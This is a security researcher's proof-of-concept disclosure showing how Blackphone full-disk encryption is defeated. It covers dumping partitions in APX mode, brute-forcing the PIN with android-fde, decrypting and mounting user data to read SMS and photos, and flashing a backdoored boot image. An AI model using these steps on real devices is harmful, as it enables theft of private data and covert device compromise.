===================================================

Crack the user data on Blackphone: Proof of Concept

===================================================
by Sbastien Dudek
Targeted versions :
- Android 4.4.2
- Kernel version 3.4.62-g00009e6
- build = KOT49H PrivatOS 1.0.5e
Dependencies :
- Python >= 2.6 but < 3
- Python M2Crypto
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ mkdir WAKdump
$ cd WAKdump
WAKdump$ git clone https://github.com/sogeti-esec-lab/android-fde.git
WAKdump$ cd android-fde/dump_nvtegra/Linux
WAKdump/android-fde/dump_nvtegra/Linux$ ls
dumpEncryptedPart.sh dumpos.sh nvflash
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To dump the encrypted "user_date.img" with "user_data_footer.img" we need to switch the device
to APX mode (no unlock mechanism are present, these steps are similar to ODIN on Samsung Galaxy
devices).
First, we have to switch off the phone and turn it on pressing the POWER button and wait until the
phone vibrates, then still holding the POWER button; we press the VOLUME-UP and VOLUME-DOWN
buttons in the same time. After that with volume down and volume up buttons we select the
NVPFlash recovery mode option and here we are in APX mode.
When it's done we can start the dump with "./dumpEncryptedPart.sh" script:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde/dump_nvtegra/Linux$ ./dumpEncryptedPart.sh
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script only dumps the needed parititons to perfom our brute-force as follows:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde/dump_nvtegra/Linux$ ls ROM
userdata_footer.img userdata.img
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
As we can see the userdata.img partition looks encrypted:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde/dump_nvtegra/Linux$ cd ROM
WAKdump/android-fde/dump_nvtegra/Linux/ROM$ userdata.img | head -n 2
00000000 64 8a ed 1b f3 d8 64 b3 a3 45 41 ea 3b 0d 79 8f |d.....d..EA.;.y.|
00000010 a7 fd 41 4d d4 57 a0 d8 99 63 2d 6c b7 93 69 ea |..AM.W...c-l..i.|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To retrieve it, we will crack this partition with "android-fde" tools (Github link:
https://github.com/sogeti-esec-lab/android-fde) :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde/dump_nvtegra/Linux$ cd ../../
WAKdump/android-fde$ cd pydroidfde
WAKdump/android-fde$ python2 bruteforce.py
usage: bruteforce.py [-h] [-d MAXPIN_DIGITS] [-o OUTPUT_KEYFILE]
encrypted_partition header_file
bruteforce.py: error: too few arguments
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To begin the brute-force, we only need to provide the output keyfile, encrypted_partition and
header_file as follows :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde$ python2 bruteforce.py -o keyblackphone ../androidfde/dump_nvtegra/Linux/ROM/userdata.img ../androidfde/dump_nvtegra/Linux/ROM/userdata_footer.img
Magic
: 0xD0B5B1C4
Major Version : 1
Minor Version : 2
Footer Size : 104 bytes
Flags
: 0x00000000
Key Size
: 128 bits
Failed Decrypts: 0
Crypto Type : aes-cbc-essiv:sha256
Encrypted Key : 0x7BEE47CD52489BCCE4CB148D32A0877A
Salt
: 0x0E92933EB21BE7D192D2518A4C9DC2A4
---------------Trying to Bruteforce Password... please wait
Trying passwords from 0 to 100
[+] This partition uses scrypt
[+] scrypt parameters are: N=0xf, r=0x3, p=0x1
Password
: 0000
Derived Key : 0x2FA82E9792A4C3ABE9352FBB4B9C31FD
Derived IV : 0x3F74FAD55977762803B03AC22CF6D47D
Decrypted Key : 0x5B49A4C3FA3971F5DA7A40BC3A6C11BE
[...] Wait until we find the right pin/password
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
When the bruteforce finds the pin/passphrase here is what happens:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[...]
Trying to Bruteforce Password... please wait
[+] This partition uses scrypt
[+] scrypt parameters are: N=0xf, r=0x3, p=0x1
Password
: 20152015
Derived Key : 0x511C4E2CD295F772C099A4332C653973
Derived IV : 0x834A6DC030E58C06F7568FD6B4DE141B
Decrypted Key : 0x81F626D9EBDF5640B6C0CF63C58B28BE
---------------Decrypted data:
00000000: A7 FD 41 4D D6 57 A0 D8 99 63 2D 6C 77 BB 01 D8 ..AM.W...c-lw...

00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
Found PIN!: 20152015
Saving decrypted master key to 'keyblackphone'
Done.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The PIN configured by 01net to encrypt the data is "20152015". Now we need to decrypt the
partition using the same"android-fde" tools:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde$ python2 decrypt.py
usage: decrypt.py [-h] [-p PASSWORD] [-s SECTOR]
encrypted_partition header_file outfile
decrypt.py: error: too few arguments
WAKdump/android-fde$ python2 decrypt.py -p 20152015 ../androidfde/dump_nvtegra/Linux/ROM/userdata.img ../androidfde/dump_nvtegra/Linux/ROM/userdata_footer.img decrypted_userdata.img
Magic
: 0xD0B5B1C4
Major Version : 1
Minor Version : 2
Footer Size : 104 bytes
Flags
: 0x00000000
Key Size
: 128 bits
Failed Decrypts: 0
Crypto Type : aes-cbc-essiv:sha256
Encrypted Key : 0x7BEE47CD52489BCCE4CB148D32A0877A
Salt
: 0x0E92933EB21BE7D192D2518A4C9DC2A4
---------------[+] This partition uses scrypt
[+] scrypt parameters are: N=0xf, r=0x3, p=0x1
Password
: 20152015
Derived Key : 0x511C4E2CD295F772C099A4332C653973
Derived IV : 0x834A6DC030E58C06F7568FD6B4DE141B
Decrypted Key : 0x81F626D9EBDF5640B6C0CF63C58B28BE
---------------~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Then wait until it decrypts the whole "userdata.img" partition...
Once the script has decrypted the data, we can start to mount the "decrypted_userdata.img" file
using the "mount" Linux command for example:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde$ sudo mount decrypted_userdata.img /mnt
WAKdump/android-fde$ cd /mnt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Then we are able to see the stored pictures that were encrypted with user data at the begining:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
mnt$ find . -name "IMG*"
./media/0/DCIM/Camera/IMG_20150126_184947.jpg
./media/0/DCIM/Camera/IMG_20150126_184951.jpg
./media/0/DCIM/Camera/IMG_20150126_184954.jpg

./media/0/DCIM/Camera/IMG_20150126_185007.jpg
./media/0/DCIM/Camera/IMG_20150126_185010.jpg
./media/0/DCIM/Camera/IMG_20150126_185014.jpg
./media/0/DCIM/Camera/IMG_20150126_185019.jpg
./media/0/DCIM/Camera/IMG_20150126_185028.jpg
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
But we can also retrieve user SMS :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
sqlite3 ./data/com.android.providers.telephony/databases/mmssms.db
SQLite version 3.8.8.2 2015-01-30 14:30:45
Enter ".help" for usage hints.
sqlite> select * from SMS;
1|1|06 80 30 73 79||1422294679062|0||1|-1|2|||Salut ! Je t'cris depuis mon super tlphone
scuris||0|0|1
2|1|+33680307379||1422296172000|1422296172000|0|0|-1|1|0||Hello ! Je suis un sms factice
viens me pirater ;)|+33660003000|0|0|0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
And so on.
Evil Maid attack
================
To perform the evil maid attack, we have to download a homemade "boot.img" to the device as
follows:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde/dump_nvtegra/Linux$ sudo nvflash -r --download 18 evilboot.img
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This way we could install a backdoor that waits for partition to be decrypted, and inject itself in other
process to extract data for example.
Conclusion
==========
No unlock procedure was needed to read or write into the flash.
So once an attacker retrieves a phone, he can backdoor or try to retrieve targeted data using the
decribded bruteforce in this mail.
It's a matter of time, and the complexity will vary depending on password complexity. In the other
hand, the "boot.img" backdooring is a very efficient way, as this partition can be downloaded quickly
to the device (few seconds).